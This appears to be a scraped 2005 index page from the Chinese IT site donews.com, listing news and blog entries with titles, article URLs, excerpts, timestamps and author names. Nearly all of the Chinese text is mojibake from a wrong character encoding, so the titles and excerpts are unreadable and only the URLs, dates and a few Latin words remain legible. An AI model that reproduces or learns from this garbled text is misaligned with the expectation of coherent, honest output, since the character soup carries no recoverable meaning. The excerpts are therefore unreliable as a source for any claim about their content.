¡¡¡¡ׂע´ֻ־ֳַׂ־·¨ֿכֿף2008ִך±±¾©°ֲװֻ»ב־ֳַׂ»¹ָװָ»½צ½צֽ¨¹‎µח׃±¨ײ½ְ´ֱֻ½גֲָ¡£־ֳַׂ׃׀׳ד¹»µִ׳װ׀ֵֿכֿףµ±ּו׃‎¼ַױֳַ»״µ½׀ֲ־ֵײ׀׀ִµִ±÷עָ´·¢ֿײ£¬ֻש׃׀½ב¹ׁׂ¾­ֶּּל¸ַµ״µִ³צֿײװֽרֹֿ£¬ֳַֻמ×ִ¿½בֹאµִ·­¿´׳ֵֽרֹֿµִ׀ֵֿ¢£¬¡°ּלִִ£¬׃׀ֿײ³¡ֿ¸½µִ׀נצ¡¢... - 2005-12-31 03:00:04 - ֽץְײ - - - ¾­¼ֳ¹²ל±¨£÷ֱֱֹ×£¬´׃ֹֹֻ¢׳יײ¯±ה³ֹ¹«ֻ¾ - http://www.donews.com/donews/article/8/89480.html - ±¾±¨¼ַױ¡¡ֽץְײ¡¡±±¾©±¨µְ ¡¡¡¡2005ִך12װֲ20ָױ£¬µ±¼ַױװֱ×ֿכׁ׀¾¿װ÷¼µ½׀ֲָ־ֱֱֹ×¹«ֻ¾׳²ֳֻן׃‎ִ‏±£¬ְָֻׂ»¹ׂ׳ֱֵ×ֿכ¹«ֻ¾µְִ¶ֹ«׀״ֵֶ£¬ֳֹֿז׀´׳ֱֵ×ֿכׁ׀¾¿װ÷¸±װ÷³₪£¬²»¹‎ױג¸צ¸תֻזֻ6ִךµִֵֶ׳׃½«÷¿לׂ×±»ֱֱֹ×¹«ֻ¾µִׂרֹ«׀״ֵֶָ¡´ת¡£ ¡¡¡¡¡°־ֿׂכֳָװ×ַל¸ר־ׂ·¢ׂ»¸צָׂ«µִֵֶ׳׃¡±£¬ֻן׃‎ִ‏׀¦׳ֳֵ‏ֱֻׂ»ֲֿ׀״ֵֶ¡£12װֲ28ָױ£¬°ְ¨ֱ×ֿכװִµִ8¼ֱֱֹׂ×ֱ×ֳֻµִײקµ¼ֶףׂµ׀²¼£÷³צ׳5200ֽעװ׳ֱֹ¢ֱֱֹ×׀ֵֿ¢¼¼ץ¹₪³ּײ׀׀ִ׃׀ֿ¹«ֻ¾(ׂװֲֿ¼ע³ֶ¡°ֱֱֹ×׀ֵֿ¢¹«ֻ¾¡±)£¬ֱֱֹ×´׃´ֻ׳×ָכ¡°±קײµִ¡±¹«ֻ¾»¯װֻ׳ק£¬װ´ַֻ°µִ3ִך¶א±¼הְן£¬ֱֱֹ×µִ¹₪׳ק£¬ײ»ַׂ»׀©¹«ֻ¾¡¢ׂ»׀©ָֻµִׂ»²¿·ײ¹₪... - 2005-12-31 02:52:22 - ֽץְײ - - - ¿לַ¹ײµְִ־ֹ§¨D¨D¹״׃blog2.0±´תµִ¼¸¸צ־±־ּג - http://www.donews.com/donews/article/8/89479.html - ׀¡ֱײ¼ׂµִ¶¹¸¯׃ײגֱָֻ£¡ ׀´ֲֿױג¸צּגִ¿£¬¾ֽֿכֶנֱץױנװֶׂ»µ״¼¦ֳ«µִ¿×ֶס£־ִׂ¼ַ׳¡µִ¿×ֽ·²»¶א£¬ױג¸צֶַהײ׀ׂ»¸צ¡£¾ֽֿף´«ֻµײ׀µִ»¯¹ֳַזױֶ£¬׳װָ»ֶ½µµִ÷ףֳזֶהµׂ‏²״׳ֵ־¾¡µִ÷ףײ¡£ ְֲֿµִblog׃ײ¹ֱֻׂ¡£ ױג¸צ¡°׃ײ¡±׳ײ£¬÷ֿװָ»ַ־ׂװ¶«©ׂ»ֲֿ¡£ֶהµ£¬ְֲֿµִblog׃¦¸ֳַµׂ»´־¹ׂ¡£²»¹‎£¬ֿכ£¬ֶ¾ְֲֿµִ¸צ׀װ£¬װֽרֲח½­÷‏ֹֿ»ל£¬±»ֹ¾ּשׂ²׃¦¸ֳ²»ַׂ»´־ֱ½´־ֱֻ°ֹ¡£ְֲֿµִblogֳָ־ִֿׂ½²»ׁׂ£¬־ׂµֱִקֱ¿ײֱ½ס»¹²»׳דֻµֱִדֽ·¡£ֶהµ£¬ֻµִblogׂ²ַ־ֳׂ¿ָױ±״ֲ§ׂ»ׁµִ¼¸¸צײ׀µִׂ»¸צ¡£»¹׃׀ׂ»¸צִַֿ¾©ֽץֹµִָ»װע²»ָ»¡£װblogֿף´ף°׳²ֻׂ»ׁשµִ2.0ִך´ת£¬÷ֳblog¾ֽֿף÷ןֽ·... - 2005-12-31 00:04:09 - ֱקֻ®¶ֹ - - - IT168ָ׳2100ֽע ³צֳָ21£¥¹ֹ· - http://www.donews.com/donews/article/8/89478.html - ¡¡¡¡Donews 12װֲ30ָױ¿לׁ¶£¨¼ַױ ֽץְײ£©¾ֿֿ¢ָֻ¿ֽ¸ֲ¶£¬¹תִַֹּיֽרױ¾www.IT168.comׁׂ¾­»סµֳ2100ֽעְֳװ×µִָ׳£¬־×´ֻIT168³צֱֳָֻ21£¥¹ֹ·¡£ ¡¡¡¡¾ֱֻ½ג£¬½ִךְ´IT168¡¢ּ«ֶ½ׁףµחִװֽרµָIT׳¨ׂµֽרױ¾ׂ»ײ±ִ±ַףֹֿ׀£¬´ַֻ°ּ«ֶ½ׁףµחִװֽרׂ»ײ±±»ָֿ־׿ִַֹ׳מָֹֿֿ׀µִֽרױ¾£¬´ֻ÷ףITֽרױ¾ױ÷ֿµִֿֿ¢ׂ²±׃׀´«ְ´ײ׀¹״´וװֿ¡¢PChomeֲ½׀ר±»Cnetױ¹÷¡£׃׀ׂµִָֻ¿ָֿ־×£¬´ֻ´־IT168³ֹ¹¦ָ׳£¬¿ִֹ¹ֶה³ֹ־×¹תִ׳¸צֹֿ׀µִIT׳¨ׂµֽרױ¾£¬ִ¿ַ°¸ֳ±ָ׳µְִ´װ´ֹ׀־´µֳµ½ײ₪µ¡££¨ֽך£© - 2005-12-30 23:40:07 - ֽץְײ - - - ½ג־צDoNews־ײֳ´£¨׳×װ״£© - http://www.donews.com/donews/article/8/89477.html - ׳×װ״׀ְֲֻ¿ֶ¼¼¡¡¡¡ ֱץָֽ£÷ׂע־×׀ְֲֻׂ×ײ±²¥£¬³ֲׂ»ײ±ָ½ֿ½קֹק£¬ֻ¾ץµֳ»בֻµ´ם»°£¬¾ֽ²»¸ֻׂµ£¬ֻשׂװֻ¾ִֵַֽ¸צ־ָ¥ֱֻ¡£־ׂ¾ץµֳ־ֳַׂµ¹ֳַ»ֻש־½£¬׳װ¼÷¼ׂµֲִ¶ש¡£־ֳַֿׂײװ¿×¼¡£ ¡¡¡¡ ÷י²¨£÷¸ק־»°ׁײ»תµק³ֹ¾²ׂפ¡£ ¡¡¡¡ ÷י²¨£÷ױג¸צ׀ֶַ־ֳַָׂ‎¸צּײֲµִ»°ּג£¬µׂ»¸צ¾ַֽױג¶־±¼ה´ף¼ׂ±ָ½ֿ¹״׳¢µִׂ»¼‏ֲ£¬¾ַַֽ§ֿנ°·ײײ®°µ״»»¹ֹױ¹÷Donewsױג¼‏ֲ£¬ױג¸צֲַיױ‎÷ֳ÷ֽ־ֳַׂDonewsµִָֻ׃׀¹״ֿµ£¬ֻשׂװױג¶־±¼ה´ף¼ׂׂ²ַ±ָ½ֿ¹״׀ִױג¼‏ֲ£¬ױג¼‏ֲַי·¢ֹתׂ²±ָ½ֽֿ»ָ»¡£ֿײװֱץֲַָֽ¼‏µִײק½ַײ®ׂ»£¬ׂ»·½ֳז´ף¼ׂ¿ֹׂװּ¸ּ¸¸ק׳װ¶װױג¼‏ֲµִ¿´·¨£¬ֱםֽג׃׀²ֳ´־ּגׂ²¿ֹ... - 2005-12-30 22:58:35 - qingerwu - - - ׀´װ2005ֻך־²2006ִךֽ· - http://www.donews.com/donews/article/8/89476.html - ִךײױֻךִ©·ח£¬ֳֵ»§ֵּµד±£»׳ףײ°´¼´¦£¬׃ׂײֹת·חװֶ£»ײ½ֹּֿ¸±ר׀¦£¬¶װֳז²»¶ָֻ£»°µּ¾ֹשֳַ³£¬±³÷ף°₪µ¶ֽ´£»׀י½£ײ¸ּלֲֿ£¬ץבץב¶ְ׳װ׀׀¡£־ׂhigh£¡£¡£¡ - 2005-12-30 22:49:59 - ׀¥װ¨¿ֽ - - - ֻ­¶¯ֱֻ2006ִךµח׳׃ֹּ־סµְִִּׂ£¿ - http://www.donews.com/donews/article/8/89475.html - ֽרֹֿ½»ׂ׳·חװֶװֶנ£¬‎½»ֻש׃­·ח¶רֹֿ ִ¿ַ°¹תִµִµח׳׃ֹּ־ס׀³¡£¬־ֲַB2B׀³¡°¢ְן°ֽ°ֽalibaba.com, »´ֿhc360.com, ָ«ַע²ֹ¹÷123trading.comׁׂןָ‎¹תׁׂו£»»¹ַB2C׀³¡ֹֿµ±µ±¡¢׳¿װ½¡¢±´ֻ‏ֻ¹ֲµָµִ¾÷ױש£»»¹ַC2C׀³¡ֹֿEbay÷ּֽװ±¦µֱִ½ַ¿ױש°װ£»ׂװ¼°½ֱ½ִך¹תֽג´ף׀ֽֽרֲח¹«ֻ¾µִ½רָכײ׀¹ת׀³¡£¬ָחֲֵׁםׁ·ױ¹÷׳¿װ½£¬Ebayױ¹÷ׂ׳ָ₪£¬ֿװ¾¹תִֽגֶףׂµ¶¼·ַ³£¿´÷ֳ¹תִµִµח׳׃ֹּ־ס׀³¡¡£ ֿײ½׳¶־°¢ְן°ֽ°ֽ¡¢ּװ±¦¡¢ׂ׳ָ₪ְ׃ֳֳַֻµִ׳½נ׃ֵֶװ¹ד¸זֹֿ²»ֿ§ׁ×±¾£¬µ«ֳַֻװױג·½ֳזµִֽ¶ָכ÷´ףµִ²דֳזַֹֿ־×ױ¸צµח׳׃ֹּ־סֱל׃ע׳צ׀´«£¬׳מײױ»סׂזµִ½«²»ײ¹ֳַַָֻ‎¼ׂ£¬... - 2005-12-30 22:43:34 - ‎½»ֻש - - - ֹ®¶אײאֹ£¬ײ׀¹״´וֲפ³¡ֹֿׁ·ײµְׁןןנײ®ֽ´ - http://www.donews.com/donews/article/8/89474.html - ֹ®¶אײאֹײ׀¹״´וֲפ³¡ֹֿׁ¡°·ײµְׁןןנ¡±ײ®ֽ´ ±¾±¨¼ַױ ½¹¼¯¬“ ֻךִ©ײ®¼£¬ײ׀¹״´וױג¿י·חֻ®±¦µ״µח׳׃ֲפ³¡׃µ¼·²»¿°µִ±³÷ף£¬ױ‎ִִַַֹֿׁ׳ֵ¡°·ײµְׁןןנ¡±µִ־ִ־ײ®¾¡£½ָױ£¬´«ֽ³ָ‎ַ¿ײ׀µֱִ½ַ¿÷£ֱת¡¢¹ט¹ָ½ר׀׀ֱֻ´ף¹זִ£µִׂµּ¬ױ¸ִ£¬׃ֶָהַ÷ףױµִ¾¶¯±»ׂµ½ח¿´׳קַ׃כ´«ֽ³µח׳׃ֲפ³¡¡°·ײµְׁןןנ¡±µִ¾¶¯ײ®ׂ»£¬¼׃ֹֿײ®ַ°ָ²©‎ֲכ³ַµִּ׃ְכ£¬°¢²¨ֲµָµח׳׃³ַµִ׃׀¼־ײױ£¬ײ׀¹״´ו¹‎׃±¥÷ֽµִµח׳׃ֲפ³¡ֳַױ‎־×ײ®ַ°µֳִ₪ִ¿³ו¶¯¸¶³צ׳ֵ´ת¼¡£ ײ¶אֲפ³¡¡°¹ׁׂעֽ·ֲפ¹·ָג¡± ´׃2002ִךֶנ£¬ײ׀¹״´וµִµח׳׃ֲפ³¡ָֿכ±¥÷ֽ½׳¶־¡£װ­±¾÷£ֱת¡¢ּ«ֶ½ׁף¡¢¹ט¹ָָ‎׳ד¶¦ֱ¢µִ¾ײֳז±»ׁ¸ֻ´עֶֶ£¬... - 2005-12-30 22:31:18 - ½¹¼¯¬“ - - - ֲ¼ׂפ£÷DoNews־ײֳ´£¿ - http://www.donews.com/donews/article/8/89473.html - DoNews׀ֲ־ְֲֵֶװ±£÷ְֵֿ£¡¢¹ש¿×ֹ­¡¢÷י²¨¡¢־ׂםּל¹¡¢ײל»װֱת¡¢ֽץְײ¡¢ֱץָֽ¡¢׃א²¨¡¢±‏ו¡¢ֽץ׀ד¾ך¡£ ֱץָֽײק³ײ¡£ ftp://210.52.50.11/donews/12.30.rar ֲ¼ׂפ׳¨׃ֳ²¥·ֵֶק£¬http://5g.donews.net:81/download/PlayerPluginSetup.rar - 2005-12-30 22:30:11 - liuren - - - ׁ¶ֻׂDV250¡°F1¡±‎ֲכ±´תµֲֳִ׃־¿ל¸׀ - http://www.donews.com/donews/article/8/89472.html - ׳ק־×±»·מ־ס°ֲֳ׃־ׂ»׳ו¡±µִ׳ז¦ׂ¯µִ׀לֿ¼¿ֽ£¬²»½צ½צַׂע־×ֻׂ»ֹת׳ד¼£±י¼°½ס»×¶«¡¢»×±±¡¢¶«ִֿׁ״÷£÷ֽװֶ¹ףµ״ַר¼ֶ16¸צ¡µִ־‎ֹ½´¨¡£¸ׂע־×ַֻ¼ַ÷ֲֳ¼´׃¶ר׀´ֱֲֻֿׂ»²¿¡¶׀לֿ¼¿ֽ׃־¼ַ¡·־×־ֳַׂ÷ףֱָֻפֱֲֻֿ±¦¹ףµִ¿ֶׁ§־ִ»¯ֵׂ²ת¡£¨D¨D¶רװֲֳ׀׀¹‎³ּ¼ֲַ¼µדµ־·ײֿם¿לְײױ‎ַ¡°ֲֳ׃־ׂ»׳ו¡±µִ׳מ´ףּ״µד¡£׳ק־×ׂ»¸צ׳ֹמ¡°ֲֳ׃־°®÷ֳױ¡±£¬׳ִֿ´³±±µִ¿סָָ¾¢ֽ·ֻ¿÷ֱ²»ׁ·׃µ±ִךµִ׳ז¦ׂ¯£¬¶רַׂ¸ַ°ׁ׳ז¦ׂ¯ױג¸צַ¼ַ÷ֲֳ¼µִ׃ֱֵ¼´«ֽ³·¢ׁן¹ג´ףֱֻ¡£׳ק־×ׂ»¸צֹת»מװ‎ֲכ±´תµִ¡°ֲֳ׃־°®÷ֳױ¡±£¬־ׂׂ×±ָµ±ִךµִ׳ז¦ׂ¯׀ׂ¸£µִ¶א¡£׃־ֹ½ְתֻ®£¬¹׀ֲֶזֳס·ח£¬ְָֻֻֿ¼ׂׂ»ֲ·µִ¹¸׀ָ´²»ֱִ¢¿ּ... - 2005-12-30 22:27:30 - mp4dv - - - 2006ִךB2B׀³¡ֶ´ף¿´µד - http://www.donews.com/donews/article/8/89471.html - 1¡¢ °¢ְן°ֽ°ֽ׃ֳֻֻׁק´ר¶¯B2B °¢ְן°ֽ°ֽװ2005ִך׳צµִ׳מַַָָֻׁעµִׂ»¼‏ֲַי¾ַֽױ¹÷ֱֵֻׁ»¢ײ׀¹ת¡£ײֱ׃ׂµִ·׳·׳ױשֱֲֻ¾¿¾¹ַֻ­ױ¹÷ֱֻֻ­µִ־ּג£¬ֳ»׃׀±״ׂ×װָ¥¾ְ²ר£¬µ«׳מײױµִ½ב¹ַ£¬ֵׁ»¢ײ׀¹ת¹יֲםװֶ¹ֱֻ¡£°¢ְן°ֽ°ֽױ¹÷ֵׁ»¢ײ׀¹ת²¢ֳ»׃׀µ«µ«¸ִ±הׂ»¸צ°זֳזױגֳ´¼עµ¥£¬ׂ²ֳ»׃׀ײ»ַ°ׁ²¿·ײ²תֶ·ָ÷ֿױגֳ´¼עµ¥£¬¹ְ¼ֵֶׁ»¢ײ׀¹תµִ¸ֱקֱ¿׃כB2Bױ÷ֿ²ֵַ¸׃׀ױנ÷³ֱ¦µִ¡£ 2¡¢ ײ׀¹ת»¯¹₪ֽר½¨ֱ¢׀׀ׂµֱ×ֳֻ ײ׀¹ת»¯¹₪ֽר¿ַֹB2Bױ¾µדִµִ®®ױ£¬׳¥׳¼ׂ»¸צ׀׀ׂµ׃׀ֹמ¶ָµִָ¥׳ךׁ׀÷ֽ·‏־ס£¬³ֹ¹¦ײ®÷ף׃ײ½¨ֱ¢·ִײ¯ֽרׂװ¼°ֶהֻ¼¸¸צ׀׀ׂµױ¾µד¡£´ֻ´־ֱ×÷ֿׂ»ֵתױ¾µדֶֽ³צֹתׂג±¦·‏־ס£¬¿ֹׂװֻµ... - 2005-12-30 19:37:44 - ¾ֵּל׀¡½« - - - ·÷־¢׀­ֽ¬¹ְםֶ½ּ¨½ר׳₪´«ֳ½÷½ִ¸ - http://www.donews.com/donews/article/8/89470.html - ½ָױ£¬·÷־¢³ֹ¹¦ַ©װ¼´«ֳ½÷½ִ¸¡×¡×ֹֿ÷£־ִ¹ד׀ֲ־ֵ´«ֳ½¼¯ֵֽ£¬ַ·÷־¢05ִך¼ּ±±¾©½חֹֿ´«ֳ½׃׀ֿ¹«ֻ¾¡¢TOM»§ֽג´«ֳ½¼¯ֵֽײ®÷ף׃ײׂ»´־׃כ´«ֳ½׀׀ׂµײ״´ף¿ֽ»§µִ³ֹ¹¦÷ֿ׳ק£¬ֻ«·½½«ֽ¨¹‎´מ½¨·÷־¢e-cology׀­ֽ¬¹ְםֶ½ּ¨£¬½רׂ»²½׃×װלֶףׂµ¸׀§µִ¹ְם÷ֽװֻ׃×»·¾³£¬־×¼¯ֳֵֽ½ּו²תׂµµִֻ³ְ·¢ױ¹ּם׳©¼׃ֽ£¬ָ«ֳזּבֹ‎¼¯ֵֽ÷ֻ׀ִ¾÷ױשֱ¦¡£ ֹֿ÷£־ִ¹ד׀ֲ־ֵ´«ֳ½¼¯ֱֵֽ¥פ׃ֹֿ÷£־ִ»¯¹ד²¥׃°׃¼¯ֵֽ£¬ַׂ»¼ׂ¼¯¹ד²¥¡¢µח׃¡¢±¨¿¯¡¢ֽרֲחµָ׃ׂ»ּוµִ¶אֳ½ּו¼¯ֵֽ¡£¼¯ֵֽ׃׀117ׂװ×׳²ת£¬5200¶אֳװ±¹₪¡£¼¯ֵַֽװ2001ִךױ÷ֹֿֿ÷£ֳָֻס¹ד²¥µחּ¨¡¢ֹֿ÷£¶«·½¹ד²¥µחּ¨¡¢ֹֿ÷£µח׃ּ¨¡¢¶«·½µח׃ּ¨¡¢ֹֿ÷£... - 2005-12-30 19:05:41 - ·÷־¢ָם¼‏ - - - ֽץ³¿ךְ£÷ֲDONEWSµֲִפµפ - http://www.donews.com/donews/article/8/89469.html - ֽץ³¿ךְ£÷ֲDONEWSµֲִפµפ ֽץ³¿ךְ/־ִ ױג¼¸ּלִײµֳ·׀·׀ׁןׁןµִDONEWS±»MOP.comױ¹÷ֲ¼‏(»עױֻµֻ«·½÷ֿ׳קׂ²¿ֹׂװ),װ¸קײײITֲּ³ֹֿױ¨¿×ֱֻ¹ר,־ׂ׳ק־×DONEWS¹ְםֵֽ¶׃µְִֿ³ֹװ±.׳מ½ֱ½ִך,׃ֹ׃ֲׂµֹֿµִ׀טׂ×,ֻהָ»ׁׂ¾­²»װµ£ָ־ָ־÷־DONEWSµִײ°־ס.µ«ַׂ²¾­³£¹״׳¢׳ֵDONEWSµִµדµ־,ֵ¼¶»בֳ°¸צֽ·װֲּ³ֹֿ·¢¸צּש׳׃,־÷עְֲֵֿֿף׃ׁ.ַ°¼¸ּל¿´µ½ױגװע׀ֲ־ֵ÷ף£¬ֳ»׃׀¶אֿכ²ֳ´£¬¾ץµֳױגַ÷ױ‎³£µֲִַי£»׳±¾׀³¡׀׀־×£¬ָח¹»»׳ק־ֱַׂץָֽ£¬ׂ²»בױגֳ´׳צµִ¡£±ֿ¾¹ֿײװױגִךֽ·£¬ּ׳ֱֻֿײ²ֳ´ֲ¶ש¶¼÷ֳ°ל¡£ ¸ױ²ֵװMSNֹֿ£¬«¸ט±¨µִ׀¡׃ד¶ש׃כ־ֱִּׂל£¬ֻµֱֻ׀©ֻ¶װDONEWSֲ¼‏µִ¿´·¨... - 2005-12-30 19:02:44 - ֽץ³¿ךְ - - - ¹‎ִךײ®ַ°±ֶױ®ֳ¦ - http://www.donews.com/donews/article/8/89468.html - ¹‎ִךײ®ַ°±ֶױ®¿ס ֶהµ־ׂׂ²ֽגֳז·ֹ׳ֵׂ»µדױ®£¬»¹ַָ¥ִך¸ױ¿×¼´´ׂµµִ±÷עֵף׃ֳַׁ׃ַׁיµִ£¬÷¶אָֻֻµֵגֱֻֻדָכ¹ֹ£¬׳¬ֱֻֻדײ׀½±£¬־ַׂׂ»׀¦ײֳײ®£¬µ«ַ±¿ֳּת¼ַ±נָֻµִ׀ֵָ־÷ֽ¿םָ£¬2005ִךׂ»ִך£¬ֳ¦ֲµײ®÷ף׃׀³ֹ¹£¬׃ַ¼±¼±µִװ¼ָֻ³װ·¹£¬ׂ»ֵתֵתµִַכֵף׃ֳַׁ¾»ב£¬ָ»÷ף°ַׁ·µִױ®£¬ֱ¬±¾´רֿ¢µִ½»»»¡£ֵף׃ֻׁµ£÷ײ׀½±ְ²£¿־ׂ׀¦ֻµ£÷ֳ»׃׀¡£ֻ¼ֿכ±ָ½ֿ´«ֽ³£¬²»װ¸ׂגַ·ָֻ¼ׂµִ£¬»¹²מׂ»¸צ´ף»§µִ£¬־ׂ´עֻד־ֲָח÷־װ12װֲ31ָױײ®ַ°¹י»¹£¬ױ‎÷ֳֽגֳז»¹׃׀ׂ»׀©ָֻׂ²ַ·־ׂµִױ£¬ׁׂ¾­ֻµ÷ֳ12װֲ31ָױײ®ַ°¸ר־ׂ¡£ µח»°ׂ»»״´נ£÷־ׁׂׂ¾­ֶרּן׀¼ְכ¿×±±¾©ֱֻ£¬2006ִך1װֲ3ָױ־ׂׂ»¶¨ָ¥ױִׂד£¡ µח»°¶‏... - 2005-12-30 18:55:53 - ±±¾©ַאֹ - - - 2005ִך¶ָIT·חװֶ°ס»ס½±ֳµ¥÷ְֽם׃ֹ - http://www.donews.com/donews/article/8/89467.html - ֻֻׁקֱל׃ע£÷ ¡¡¡¡׳מ¼ֶָֻׁר½± °¶ָ »ס½±ְם׃ֹ£÷ֻש׃׀‎¾¶¼±ם¾°¶ִָ¿ַ°ַײ׀¹תֽרֳס¹׃ֳ׳מ¶אµִֻֻׁקׂ‎ַז¡£ ¡¡¡¡׳מ¼ׁ׃×ֿת½± ײ׀ֻׁ »ס½±ְם׃ֹ£÷ֽרֲחײםµִ׳°²׳°‎ֱ¿װֹֹֿ‎£¬ֽרֲחײםײײִַ¶µִ÷ֿ׳ק¹«ֻ¾µִִָװ½ְ´װ½¶א¡£ ¡¡¡¡ִך¶ָ·חװֶ½± ֵׁ»¢ײ׀¹ת »ס½±ְם׃ֹ£÷ָ«ֳז׳×׀ֽ£¬¼ב¶¨µ״½ר¾ֻֻׁק¡£ ׳מ¾ֹּׂµ¼ײµ½± ׀ְֲֻ°®־ »ס½±ְם׃ֹ£÷³ֹ¹¦µ״½«ֽר׃ׁ־´נ׃כױ¾ִֻֻׁקֿא½ב÷ֿ£¬ֳָֻֻׁק¾׃׀׳מֿ»מµִֹתֱֳ¦¡£ֻֻׁקִ¿±ךµִײ±´ן׀װ»ב´רְ´¸¸µִֹּׂµ¼ײµ¡£ ¡¡¡¡µח׳׃ֹּ־סֱל׃ע£÷ ¡¡¡¡׳מ¼ׁ½»ׂ׳ֶ½ּ¨½± °¢ְן°ֽ°ֽ »ס½±ְם׃ֹ£÷°¢ְן°ֽ°ֽ³ֹ¹¦µ״½¨ֱ¢ֱֻׂ»¸צ׳מ׃׀׀ֵ׃‏µִB2B׀ֵ... - 2005-12-30 18:27:54 - ֱת·ֹּלֲֿ - - - ¶א¼ָׂ¨ֽ‏ֳ½ּוֱ×÷ֿ·¢²¼¡°It ·חװֶ°ס¡± - http://www.donews.com/donews/article/8/89466.html - 12װֲ29ָױ£¬׃ֹײ׀¹ת׳מ´ףITֳֵ»§ֽרױ¾ּל¼«ֽר¡¢ײ׀¹ת׳מ´ףµִ׳÷ֳֵֿ»§ֽרױ¾׀ְֲֻֽר÷ֽײ׀¹ת·¢׀׀ֱ¿׳מ´ףµִ¾­¼ְֳא±¨ײ½ײ׀¹ת¾­׃×±¨ֱ×÷ֿײק°ל¡¢20¶א¼ֳׂ½ּו׀­°לµִµִֻ½ל¡°IT·חװֶ°ס¡±ִך¶ְֶָׁ¡»מ¶¯װ±±¾©½ֿׂ‏¡£¾ֿ₪£¬׳ק־×ײ׀¹תITׂµ¹זִ£׳מ´ףµִִך¶ְֶָׁ¡»מ¶¯÷ֽׂµִ¢»ב£¬½סִךµִIT·חװֶ°סְֶׁ¡װ׃²¼‏¡¢ָם¼‏׃כ׀ֵֿ¢»¯¡¢‎׳ײ¼ֽׂ¥¡¢ײ»ת¡¢µח׳׃ֹּ־ס¡¢ֻֻׁקׂ‎ַז¡¢ֽרֲח׃־ֿ·¡¢ֹחַרµָ°ֻ´ףָָµדֱל׃עְֶׁ¡ִך¶ָ׳מ¼ֶׁףׂµ£¬²¢·¢²¼2005ִך¶ָ®´ףIT׀ֲ־ֵ(¼¸½¼‏)¡£ ¾ֿ₪£¬ײ׀¹תIT²תֶ·³צ¿׳¶מ³¬¹‎ְֳ¹ת¡¢AMD¶װ׃¢ּ״¶ּבֶנ·´ֽ׀ְ­ֻ¹ֻֻֿ¡¢ֱ×ֿכ»»ֻ§¡¢°¢ְן°ֽ°ֽױ¹÷ֵׁ»¢ײ׀¹ת¡¢Google÷ֽ°¶ָׂ‎... - 2005-12-30 18:26:29 - ֱת·ֹּלֲֿ - - - 2005׃עֳׂµֵׂ÷¶ֲײ®¾ֵ:ּלִֹׁחַרcom׃עֳ±»׀®³ײ - http://www.donews.com/donews/article/8/89465.html - ´«ֳ½&gt;&gt;׳ׂ³&gt;&gt;ױ‎־ִַר 05׃עֳׂµֵׂ÷¶ֲײ®¾ֵ:ּלִֹׁחַרcom׃עֳ±»׀®³ײ http://www.qianlong.com/ ¡¡ 2005-12-30 17:26:50 ¡¡¡¡[±¾ֿµֱ׀ׂ‎ׁװ] 2005ִך¼´½«¹‎ָ¥£¬ִ¿¶ֳׂ»ִךְ´װײ׀¹ת׃עֳׂµ·¢ֹתµִׂ»¼‏¼‏ׂ‎ָֻ׳¢ִ¿ֲ¼‏£¬±ױִג³צֱֻ¡¶2005ִךײ׀¹ת׃עֳׂµ®´ףֿ²ֲ¡·¼°¡¶2005ִךײ׀¹ת׃עֳׂµ®´ףֵׂ÷¶ֲ¡·¶‏¸צֿµֱ׀׳¨ּג£¬װׂ»ֵת׃עֳׂµִ׳¨¼ׂ¡¢ֽר׃ׁµִ°ןײת÷ֽײ§³ײֲֿ£¬½«2005ִך¶ִָׂ»׀©ֱמָֻ¸׀´¥µֲִ¼‏£¬װִךµ׳ַ°¿×¼ׂ»ׂ»ׂװ±־×¼ַ£¬ֱפֲֿׂ»׀©÷ףָֻ»״־¶µִ־ִ׳ײ£¬½טׂװֶֽׂ‎ֶנ¸¶אָֻ¹״׳¢ײ׀¹ת׃עֳׂµ·¢ױ¹£¬ֳָ¸¶אֳָֻק°׳׃עֳµִ÷ְֿם¹... - 2005-12-30 17:58:59 - sz1961sy - - - ײ״׃׀ֵֿ¢»¯ײ׀µִָֻ־ִ½¨ֹט - http://www.donews.com/donews/article/8/89464.html - IT¼¼ץ÷ֶֽףׂµ׀ֵֿ¢»¯µִׁ¸ֻ·¢ױ¹£¬÷¶אֶףׂµװ±¹₪ֽ¨¹‎VPNֱ¬ָח¹«ֻ¾ֽרֲח£¬µֿײֱֻװ¼ׂ°ל¹«£¬ֽ¬ֲײ®¼ה ²»¹´ףֲ׀¡ֲ´ף¶¼ׂ²ַֽ¨¹‎msnײ®ְאµִ¼°±ֱִּל¹₪¾¡£ּ״±נַ¶װ׃׀ֵֿ¢ֿµֽ³¸¶ָֽ³ׂ»£¬׀ֵֿ¢¹ֲµ÷ֽךָ«ֿ§ֹץײֱ µֿײֱֻ‎¾´ף¼¯ײ׀µִֶףׂµ£¬ָֻ׃כָֻײ®¼הµִµ±ֳז¹µֽ¨¸ַֹײ®׃ײֹ¡£ִׁ¹ײׂ»׀©ֶףׂµװ±¹₪¸׀ּ¾£¬"‎¾´ף¼¯ײ׀ֱֻ£¬ ׀ֵֿ¢¹ֲµ÷ֳ»ֱֻ£¬ָֻµִ¹ֲµ÷ָ´¶אֱֻ"£¬"ֿµֽ³ֱ×ֽ¨ֱֻ£¬ָֻװ±ָ´ֶׂ¶¯ֱֻ¡£"ׂע´ֻ£¬CIOֳַװֿ³‎׀ֵֿ¢¹ֲµ÷µִֽ¬±£¬ׂ» ¶¨ׂ×¾¯ּטָֻװ±¹ֲµ÷µִ²תֹת¡£ַ°¼¸ּל²ֹ·ֳ½׃´¥ֱֻ÷¶א־ֲײֳס׃×ֶףׂµ£¬װּ½¾¿ֳַֻ׀ֵֿ¢»¯½¨ֹטִ£½µִֽ¬±£¬ױג׀©ֳסֶף¶װֶףׂµ־ִ»¯½¨ֹטµִ... - 2005-12-30 17:44:16 - ¸¡·ח - - - ֱק¿ֽֽר--µָ‎´ת־ִ׳ײ¹ד¸זµד»קֱקֱ¿½»»»£¨½»ׂ׳£©ֿµֽ³ - http://www.donews.com/donews/article/8/89463.html - ¹״׃ֱק¿ֽ ֱק¿ֽֽרַ׃ֹײרֳױ¾³₪¡°ֲם¹תֱ¼¡±¿×·¢µִµָ‎´ת־ִ׳ײµד»קֱקֱ¿½»»»£¨½»ׂ׳£©ֿµֽ³¡£ ֱק¿ֽ־ִ»¯׳ײ¼£÷ִתµִֽרױ¾ֳ»׃׀ֱקֱ¿£¬ֱק¿ֽ°ןִת¿לֻּב¸ֱקֱ¿£»ִתµִֽרױ¾ֱקֱ¿²»´ם£¬ֱק¿ֽ»¹ִּב¸ִתֱקֱ¿£¬¶רַֻׂ¿÷ֱ²»ֳִָתµִֽרױ¾µֱִקֱ¿°׳ֱק£¬ֱק¿ֽ°ןִת°ֻׁ±ה³ֹֿײ½נ£¡ 